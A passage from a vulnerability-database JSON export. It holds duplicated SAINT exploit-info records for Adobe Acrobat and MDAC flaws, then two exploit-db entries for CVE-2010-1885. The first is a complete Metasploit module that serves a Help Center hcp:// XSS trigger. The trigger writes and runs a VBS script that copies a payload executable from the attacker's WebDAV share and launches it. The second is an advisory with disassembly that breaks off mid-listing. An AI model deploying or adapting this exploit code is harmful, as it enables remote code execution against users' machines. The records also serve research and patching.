"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:02:02", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "description": "Added: 03/27/2009 \nCVE: [CVE-2009-0927](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>) \nBID: [34169](<http://www.securityfocus.com/bid/34169>) \n\n\n### Background\n\n[Adobe Acrobat](<http://www.adobe.com/products/acrobat/>) is software for creating PDF documents. [Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a PDF file which calls the JavaScript getIcon method with a long, specially crafted argument. \n\n### Resolution\n\nUpgrade to Adobe Acrobat 7.1.1, 8.1.4, or 9.1 or higher as described in [APSB09-04](<http://www.adobe.com/support/security/bulletins/apsb09-04.html>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-014/> \n\n\n### Limitations\n\nExploit works on Adobe Acrobat 9.0 and requires a user to load the exploit file in Adobe Acrobat. \n\n### Platforms\n\nWindows XP \n \n\n", "edition": 1, "modified": "2009-03-27T00:00:00", "published": "2009-03-27T00:00:00", "id": "SAINT:AFE3E3BE3BB3652683F3F01263CCE593", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/adobe_acrobat_javascript_geticon", "title": "Adobe Acrobat JavaScript getIcon method buffer overflow ", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "edition": 2, "description": "Added: 03/27/2009 \nCVE: [CVE-2009-0927](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>) \nBID: [34169](<http://www.securityfocus.com/bid/34169>) \n\n\n### Background\n\n[Adobe Acrobat](<http://www.adobe.com/products/acrobat/>) is software for creating PDF documents. [Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a PDF file which calls the JavaScript getIcon method with a long, specially crafted argument. \n\n### Resolution\n\nUpgrade to Adobe Acrobat 7.1.1, 8.1.4, or 9.1 or higher as described in [APSB09-04](<http://www.adobe.com/support/security/bulletins/apsb09-04.html>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-014/> \n\n\n### Limitations\n\nExploit works on Adobe Acrobat 9.0 and requires a user to load the exploit file in Adobe Acrobat. \n\n### Platforms\n\nWindows XP \n \n\n", "modified": "2009-03-27T00:00:00", "published": "2009-03-27T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/adobe_acrobat_javascript_geticon", "id": "SAINT:654B00AF52A01A1D29119E4E92043279", "title": "Adobe Acrobat JavaScript getIcon method buffer overflow ", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "description": "Added: 03/27/2009 \nCVE: [CVE-2009-0927](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>) \nBID: [34169](<http://www.securityfocus.com/bid/34169>) \n\n\n### Background\n\n[Adobe Acrobat](<http://www.adobe.com/products/acrobat/>) is software for creating PDF documents. [Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a PDF file which calls the JavaScript getIcon method with a long, specially crafted argument. \n\n### Resolution\n\nUpgrade to Adobe Acrobat 7.1.1, 8.1.4, or 9.1 or higher as described in [APSB09-04](<http://www.adobe.com/support/security/bulletins/apsb09-04.html>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-014/> \n\n\n### Limitations\n\nExploit works on Adobe Acrobat 9.0 and requires a user to load the exploit file in Adobe Acrobat. \n\n### Platforms\n\nWindows XP \n \n\n", "edition": 4, "modified": "2009-03-27T00:00:00", "published": "2009-03-27T00:00:00", "id": "SAINT:3FD55356C59C08B007A70159ACFB7A63", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/adobe_acrobat_javascript_geticon", "title": "Adobe Acrobat JavaScript getIcon method buffer overflow ", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0003"], "description": "Added: 07/16/2007 \nCVE: [CVE-2006-0003](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003>) \nBID: [17462](<http://www.securityfocus.com/bid/17462>) \nOSVDB: [24517](<http://www.osvdb.org/24517>) \n\n\n### Background\n\n[Microsoft Data Access Components (MDAC)](<http://support.microsoft.com/kb/842193/>) enable Universal Data Access in Windows applications deployed over a network. \n\n### Problem\n\nA cross-zone scripting vulnerability in the RDS.Dataspace ActiveX control in MDAC allows command execution when a user loads a specially crafted web page. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 06-014](<http://www.microsoft.com/technet/security/bulletin/MS06-014.mspx>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/234812> \n\n\n### Limitations\n\nOn Windows 2000, MDAC must be installed. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2007-07-16T00:00:00", "published": "2007-07-16T00:00:00", "id": "SAINT:D7F75EFDCAC463A90F06C660FBFD2D10", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/mdac_rds_dataspace", "type": "saint", "title": "Windows MDAC RDS.Dataspace ActiveX control vulnerability", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:36", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0003"], "description": "Added: 07/16/2007 \nCVE: [CVE-2006-0003](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003>) \nBID: [17462](<http://www.securityfocus.com/bid/17462>) \nOSVDB: [24517](<http://www.osvdb.org/24517>) \n\n\n### Background\n\n[Microsoft Data Access Components (MDAC)](<http://support.microsoft.com/kb/842193/>) enable Universal Data Access in Windows applications deployed over a network. \n\n### Problem\n\nA cross-zone scripting vulnerability in the RDS.Dataspace ActiveX control in MDAC allows command execution when a user loads a specially crafted web page. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 06-014](<http://www.microsoft.com/technet/security/bulletin/MS06-014.mspx>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/234812> \n\n\n### Limitations\n\nOn Windows 2000, MDAC must be installed. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2007-07-16T00:00:00", "published": "2007-07-16T00:00:00", "id": "SAINT:BC1DB9AB9516112650D9CE49519F32F1", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/mdac_rds_dataspace", "title": "Windows MDAC RDS.Dataspace ActiveX control vulnerability", "type": "saint", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T17:19:46", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0003"], "edition": 2, "description": "Added: 07/16/2007 \nCVE: [CVE-2006-0003](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003>) \nBID: [17462](<http://www.securityfocus.com/bid/17462>) \nOSVDB: [24517](<http://www.osvdb.org/24517>) \n\n\n### Background\n\n[Microsoft Data Access Components (MDAC)](<http://support.microsoft.com/kb/842193/>) enable Universal Data Access in Windows applications deployed over a network. \n\n### Problem\n\nA cross-zone scripting vulnerability in the RDS.Dataspace ActiveX control in MDAC allows command execution when a user loads a specially crafted web page. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 06-014](<http://www.microsoft.com/technet/security/bulletin/MS06-014.mspx>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/234812> \n\n\n### Limitations\n\nOn Windows 2000, MDAC must be installed. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2007-07-16T00:00:00", "published": "2007-07-16T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/mdac_rds_dataspace", "id": "SAINT:191E4D213693C8769F03A620EE4E529A", "type": "saint", "title": "Windows MDAC RDS.Dataspace ActiveX control vulnerability", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T00:06:28", "description": "Microsoft Help Center XSS and Command Execution. CVE-2010-1885. Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "type": "exploitdb", "title": "Microsoft Help Center XSS and Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16545", "href": "https://www.exploit-db.com/exploits/16545/", "sourceData": "##\r\n# $Id: ms10_042_helpctr_xss_cmd_exec.rb 10388 2010-09-20 04:37:25Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\t#\r\n\t# This module acts as an HTTP server\r\n\t#\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t\t=> 'Microsoft Help Center XSS and Command Execution',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\t\tHelp and Support Center is the default application provided to access online\r\n\t\t\t\tdocumentation for Microsoft Windows. Microsoft supports accessing help documents\r\n\t\t\t\tdirectly via URLs by installing a protocol handler for the scheme \"hcp\". Due to\r\n\t\t\t\tan error in validation of input to hcp:// combined with a local cross site\r\n\t\t\t\tscripting vulnerability and a specialized mechanism to launch the XSS trigger,\r\n\t\t\t\tarbitrary command execution can be achieved.\r\n\r\n\t\t\t\tOn IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it\r\n\t\t\t\tcan be used to launch the exploit automatically. If IE8 and WMP11, either can\r\n\t\t\t\tbe used to launch the attack, but both pop dialog boxes asking the user if\r\n\t\t\t\texecution should continue. This exploit detects if non-intrusive mechanisms are\r\n\t\t\t\tavailable and will use one if possible. In the case of both IE8 and WMP11, the\r\n\t\t\t\texploit defaults to using an iframe on IE8, but is configurable by setting the\r\n\t\t\t\tDIALOGMECH option to \"none\" or \"player\".\r\n\t\t\t},\r\n\t\t\t'Author'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Tavis Ormandy', # Original discovery\r\n\t\t\t\t\t'natron' # Metasploit version\r\n\t\t\t\t],\r\n\t\t\t'License'\t\t=> MSF_LICENSE,\r\n\t\t\t'Version'\t\t=> '$Revision: 10388 $',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-1885' ],\r\n\t\t\t\t\t[ 'OSVDB', '65264' ],\r\n\t\t\t\t\t[ 'URL', 'http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/ADVISORY' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.microsoft.com/technet/security/advisory/2219475.mspx' ],\r\n\t\t\t\t\t[ 'MSB', 'MS10-042']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload'\t\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space'\t=> 2048,\r\n\t\t\t\t},\r\n\t\t\t'Platform'\t\t=> 'win',\r\n\t\t\t'Targets'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic',\t{ } ]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 09 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptPort.new(\t'SRVPORT',\t\t [ true, \"The daemon port to listen on\", 80 ]),\r\n\t\t\t\tOptString.new(\t'URIPATH',\t\t [ true, \"The URI to use.\", \"/\" ]),\r\n\t\t\t\tOptString.new(\t'DIALOGMECH',\t [ true, \"IE8/WMP11 trigger mechanism (none, iframe, or player).\", \"iframe\"])\r\n\t\t\t], self.class)\r\n\r\n\t\tderegister_options('SSL', 'SSLVersion') # Just for now\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\t# If there is no subdirectory in the request, we need to redirect.\r\n\t\tif (request.uri == '/') or not (request.uri =~ /\\/[^\\/]+\\//)\r\n\t\t\tif (request.uri == '/')\r\n\t\t\t\tsubdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'\r\n\t\t\telse\r\n\t\t\t\tsubdir = request.uri + '/'\r\n\t\t\tend\r\n\t\t\tprint_status(\"Request for \\\"#{request.uri}\\\" does not contain a sub-directory, redirecting to #{subdir} ...\")\r\n\t\t\tsend_redirect(cli, subdir)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\r\n\t\tcase request.method\r\n\t\twhen 'OPTIONS'\r\n\t\t\tprocess_options(cli, request)\r\n\t\twhen 'PROPFIND'\r\n\t\t\tprocess_propfind(cli, request)\r\n\t\twhen 'GET'\r\n\t\t\tprocess_get(cli, request)\r\n\t\telse\r\n\t\t\tprint_error(\"Unexpected request method encountered: #{request.method}\")\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef process_get(cli, request)\r\n\r\n\t\t@my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n\t\twebdav_loc = \"\\\\\\\\#{@my_host}\\\\#{@random_dir}\\\\#{@payload}\"\r\n\t\t@url_base = \"http://\" + @my_host\r\n\r\n\t\tif (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri))\r\n\t\t\tprint_status \"Sending payload executable to target ...\"\r\n\t\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\t\t\tdata = generate_payload_exe({ :code => p.encoded })\r\n\r\n\t\t\tsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif request.uri.match(/\\.gif$/)\r\n\t\t\t# \"world's smallest gif\"\r\n\t\t\tdata = \"GIF89a\\x01\\x00\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00!\\xF9\\x04\\x01\"\r\n\t\t\tdata += \"\\x00\\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x00\\x02\\x02D\\x01\\x00;\"\r\n\t\t\tprint_status \"Sending gif image to WMP at #{cli.peerhost}:#{cli.peerport} ...\"\r\n\t\t\tsend_response(cli, data, { 'Content-TYpe' => 'image/gif' } )\r\n\t\tend\r\n\r\n\t\t# ASX Request Inbound\r\n\t\tif request.uri.match(/\\.asx$/)\r\n\t\t\tasx = %Q|<ASX VERSION=\"3.0\">\r\n<PARAM name=\"HTMLView\" value=\"URLBASE/STARTHELP\"/>\r\n<ENTRY>\r\n\t<REF href=\"URLBASE/IMGFILE\"/>\r\n</ENTRY>\r\n</ASX>\r\n|\r\n\t\t\tasx.gsub!(/URLBASE/, @url_base)\r\n\t\t\tasx.gsub!(/STARTHELP/, @random_dir + \"/\" + @start_help)\r\n\t\t\tasx.gsub!(/IMGFILE/, @random_dir + \"/\" + @img_file)\r\n\t\t\tprint_status(\"Sending asx file to #{cli.peerhost}:#{cli.peerport} ...\")\r\n\t\t\tsend_response(cli, asx, { 'Content-Type' => 'text/html' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# iframe request inbound from either WMP or IE7\r\n\t\tif request.uri.match(/#{@start_help}/)\r\n\r\n\t\t\thelp_html = %Q|<iframe src=\"hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E\">|\r\n\r\n\t\t\trand_vbs\t= rand_text_alpha(rand(2)+1) + \".vbs\"\r\n\t\t\tcopy_launch = %Q^cmd /c copy #{webdav_loc} %TEMP% && %TEMP%\\\\#{@payload}^\r\n\t\t\tvbs_content = %Q|WScript.CreateObject(\"WScript.Shell\").Run \"#{copy_launch}\",0,false|\r\n\t\t\twrite_vbs\t= %Q|cmd /c echo #{vbs_content}>%TEMP%\\\\#{rand_vbs}|\r\n\t\t\tlaunch_vbs = %Q|cscript %TEMP%\\\\#{rand_vbs}>nul|\r\n\t\t\tconcat_cmds = \"#{write_vbs}|#{launch_vbs}\"\r\n\r\n\t\t\teval_block = \"Run(String.fromCharCode(#{convert_to_char_code(concat_cmds)}));\"\r\n\t\t\teval_block = Rex::Text.uri_encode(Rex::Text.uri_encode(eval_block))\r\n\t\t\thelp_html.gsub!(/COMMANDS/, eval_block)\r\n\t\t\tprint_status(\"Sending exploit trigger to #{cli.peerhost}:#{cli.peerport} ...\")\r\n\t\t\tsend_response(cli, help_html, { 'Content-Type' => 'text/html' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# default initial response\r\n\t\tjs = %Q|\r\nvar asx = \"URLBASE/ASXFILE\";\r\nvar ifr = \"URLBASE/IFRFILE\";\r\n\r\nfunction launchiframe(src) {\r\n\tvar o = document.createElement(\"IFRAME\");\r\n\to.setAttribute(\"width\",\"0\");\r\n\to.setAttribute(\"height\",\"0\");\r\n\to.setAttribute(\"frameborder\",\"0\");\r\n\to.setAttribute(\"src\",src);\r\n\tdocument.body.appendChild(o);\r\n}\r\n\r\nif (window.navigator.appName == \"Microsoft Internet Explorer\") {\r\n\tvar ua = window.navigator.userAgent;\r\n\tvar re = new RegExp(\"MSIE ([0-9]{1,}[\\.0-9]{0,})\");\r\n\tre.exec(ua)\r\n\tver = parseFloat( RegExp.$1 );\r\n\r\n\t// if ie8, check WMP version\r\n\tif (ver > 7) {\r\n\t\tvar o = document.createElement(\"OBJECT\");\r\n\t\to.setAttribute(\"classid\", \"clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6\");\r\n\t\to.setAttribute(\"uiMode\", \"invisible\");\r\n\t\t// if wmp9, go ahead and launch\r\n\t\tif( parseInt(o.versionInfo) < 10 ) {\r\n\t\t\to.openPlayer(asx);\r\n\t\t// if > wmp9, only launch if user requests\r\n\t\t} else {\r\n\t\t\tDIALOGMECH\r\n\t\t}\r\n\t// if ie7, use iframe\r\n\t} else {\r\n\t\tlaunchiframe(ifr);\r\n\t}\r\n} else {\r\n\t// if other, try iframe\r\n\tlaunchiframe(ifr);\r\n}\r\n|\r\n\r\n\t\thtml = %Q|<html>\r\n<head></head><body><script>JAVASCRIPTFU\r\n</script>\r\n</body>\r\n</html>\r\n|\r\n\t\tcase datastore['DIALOGMECH']\r\n\t\twhen \"player\"\r\n\t\t\tmech = \"o.openPlayer(asx);\"\r\n\t\twhen \"iframe\"\r\n\t\t\tmech = \"launchiframe(ifr);\"\r\n\t\twhen \"none\"\r\n\t\t\tmech = \"\"\r\n\t\telse\r\n\t\t\tmech = \"\"\r\n\t\tend\r\n\r\n\t\thtml.gsub!(/JAVASCRIPTFU/, js)\r\n\t\thtml.gsub!(/DIALOGMECH/, mech)\r\n\t\thtml.gsub!(/URLBASE/, @url_base)\r\n\t\thtml.gsub!(/ASXFILE/, @random_dir + \"/\" + @asx_file)\r\n\t\thtml.gsub!(/IFRFILE/, @random_dir + \"/\" + @start_help)\r\n\r\n\t\tprint_status(\"Sending exploit html to #{cli.peerhost}:#{cli.peerport} ...\")\r\n\r\n\t\theaders = {\r\n\t\t\t'Content-Type'\t\t=> 'text/html',\r\n\t\t\t#'X-UA-Compatible'\t=> 'IE=7'\r\n\t\t}\r\n\r\n\t\tsend_response(cli, html, headers)\r\n\tend\r\n\r\n\t#\r\n\t# OPTIONS requests sent by the WebDav Mini-Redirector\r\n\t#\r\n\tdef process_options(cli, request)\r\n\t\tprint_status(\"Responding to WebDAV OPTIONS request from #{cli.peerhost}:#{cli.peerport}\")\r\n\t\theaders = {\r\n\t\t\t#'DASL' => '<DAV:sql>',\r\n\t\t\t#'DAV' => '1, 2',\r\n\t\t\t'Allow' => 'OPTIONS, GET, PROPFIND',\r\n\t\t\t'Public' => 'OPTIONS, GET, PROPFIND'\r\n\t\t}\r\n\t\tsend_response(cli, '', headers)\r\n\tend\r\n\r\n\tdef convert_to_char_code(str)\r\n\t\treturn str.unpack('H*')[0].gsub(Regexp.new(\".{#{2}}\", nil, 'n')) { |s| s.hex.to_s + \",\" }.chop\r\n\tend\r\n\t#\r\n\t# PROPFIND requests sent by the WebDav Mini-Redirector\r\n\t#\r\n\tdef process_propfind(cli, request)\r\n\t\tpath = request.uri\r\n\t\tprint_status(\"Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport}\")\r\n\t\tbody = ''\r\n\r\n\t\tif (Regexp.new(Regexp.escape(@payload)+'$', true).match(path))\r\n\t\t\t# Response for the EXE\r\n\t\t\tprint_status(\"Sending EXE multistatus for #{path} ...\")\r\n#<lp1:getcontentlength>45056</lp1:getcontentlength>\r\n\t\t\tbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>\r\n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"39e0132-b000-43c6e5f8d2f80\"</lp1:getetag>\r\n<lp2:executable>F</lp2:executable>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n</D:multistatus>\r\n|\r\n\t\telsif (path =~ /\\.manifest$/i) or (path =~ /\\.config$/i) or (path =~ /\\.exe/i)\r\n\t\t\tprint_status(\"Sending 404 for #{path} ...\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\r\n\t\telsif (path =~ /\\/$/) or (not path.sub('/', '').index('/'))\r\n\t\t\t# Response for anything else (generally just /)\r\n\t\t\tprint_status(\"Sending directory multistatus for #{path} ...\")\r\n\t\t\tbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\r\n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>\r\n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"39e0001-1000-4808c3ec95000\"</lp1:getetag>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n</D:multistatus>\r\n|\r\n\r\n\t\telse\r\n\t\t\tprint_status(\"Sending 404 for #{path} ...\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# send the response\r\n\t\tresp = create_response(207, \"Multi-Status\")\r\n\t\tresp.body = body\r\n\t\tresp['Content-Type'] = 'text/xml'\r\n\t\tcli.send_response(resp)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t@random_dir = rand_text_alpha(rand(2)+1)\r\n\t\t@asx_file\t= rand_text_alpha(rand(2)+1) + \".asx\"\r\n\t\t@start_help\t= rand_text_alpha(rand(2)+1) + \".html\"\r\n\t\t@payload\t= rand_text_alpha(rand(2)+1) + \".exe\"\r\n\t\t@img_file\t= rand_text_alpha(rand(2)+1) + \".gif\"\r\n\r\n\t\tif datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\r\n\t\t\traise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'\r\n\t\tend\r\n\r\n\t\tsuper\r\n\tend\r\nend\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16545/"}, {"lastseen": "2016-02-01T18:31:14", "description": "Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly. CVE-2010-1885. Remote exploit for windows platform", "published": "2010-06-10T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "modified": "2010-06-10T00:00:00", "id": "EDB-ID:13808", "href": "https://www.exploit-db.com/exploits/13808/", "sourceData": "Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly\r\n----------------------------------------------------------------------------\r\n\r\nHelp and Support Centre is the default application provided to access online\r\ndocumentation for Microsoft Windows. Microsoft supports accessing help documents\r\ndirectly via URLs by installing a protocol handler for the scheme \"hcp\", \r\na typical example is provided in the Windows XP Command Line Reference,\r\navailable at http://technet.microsoft.com/en-us/library/bb490918.aspx.\r\n\r\nUsing hcp:// URLs is intended to be safe, as when invoked via the registered\r\nprotocol handler the command line parameter /fromhcp is passed to the help\r\ncentre application. This flag switches the help centre into a restricted mode,\r\nwhich will only permit a whitelisted set of help documents and parameters.\r\n\r\nThis design, introduced in SP2, is reasonably sound. A whitelist of trusted\r\ndocuments is a safe way of allowing interaction with the documentation from\r\nless-trusted sources. Unfortunately, an implementation error in the whitelist\r\nallows it to be evaded.\r\n\r\nURLs are normalised and unescaped prior to validation using\r\nMPC::HTML::UrlUnescapeW(), which in turn uses MPC::HexToNum() to translate URL\r\nescape sequences into their original characters, the relevant code from\r\nhelpctr.exe 5.1.2600.5512 (latest at time of writing) is below.\r\n\r\n.text:0106684C Unescape:\r\n.text:0106684C cmp di, '%' ; di contains the current wchar in the input URL.\r\n.text:01066850 jnz short LiteralChar ; if this is not a '%', it must be a literal character.\r\n.text:01066852 push esi ; esi contains a pointer to the current position in URL to unescape.\r\n.text:01066853 call ds:wcslen ; find the remaining length.\r\n.text:01066859 cmp word ptr [esi], 'u' ; if the next wchar is 'u', this is a unicode escape and I need 4 xdigits.\r\n.text:0106685D pop ecx ; this sequence calculates the number of wchars needed (4 or 2).\r\n.text:0106685E setz cl ; i.e. %uXXXX (four needed), or %XX (two needed).\r\n.text:01066861 mov dl, cl\r\n.text:01066863 neg dl\r\n.text:01066865 sbb edx, edx\r\n.text:01066867 and edx, 3\r\n.text:0106686A inc edx\r\n.text:0106686B inc edx\r\n.text:0106686C cmp eax, edx ; test if I have enough characters in input to decode.\r\n.text:0106686E jl short LiteralChar ; if not enough, this '%' is considered literal.\r\n.text:01066870 test cl, cl\r\n.text:01066872 movzx eax, word ptr [esi+2]\r\n.text:01066876 push eax\r\n.text:01066877 jz short NotUnicode\r\n.text:01066879 call HexToNum ; call MPC::HexToNum() to convert this nibble (4 bits) to an integer.\r\n.text:0106687E mov edi, eax ; edi contains the running total of the value of this escape sequence.\r\n.text:01066880 movzx eax, word ptr [esi+4]\r\n.text:01066884 push eax\r\n.text:01066885 shl edi, 4 ; shift edi left 4 positions to make room for the next digit, i.e. total <<= 4;\r\n.text:01066888 call HexToNum \r\n.text:0106688D or edi, eax ; or the next value into the 4-bit gap, i.e. total |= val.\r\n.text:0106688F movzx eax, word ptr [esi+6]; this process continues for the remaining wchars.\r\n.text:01066893 push eax\r\n.text:01066894 shl edi, 4\r\n.text:01066897 call HexToNum\r\n.text:0106689C or edi, eax\r\n.text:0106689E movzx eax, word ptr [esi+8]\r\n.text:010668A2 push eax\r\n.text:010668A3 shl edi, 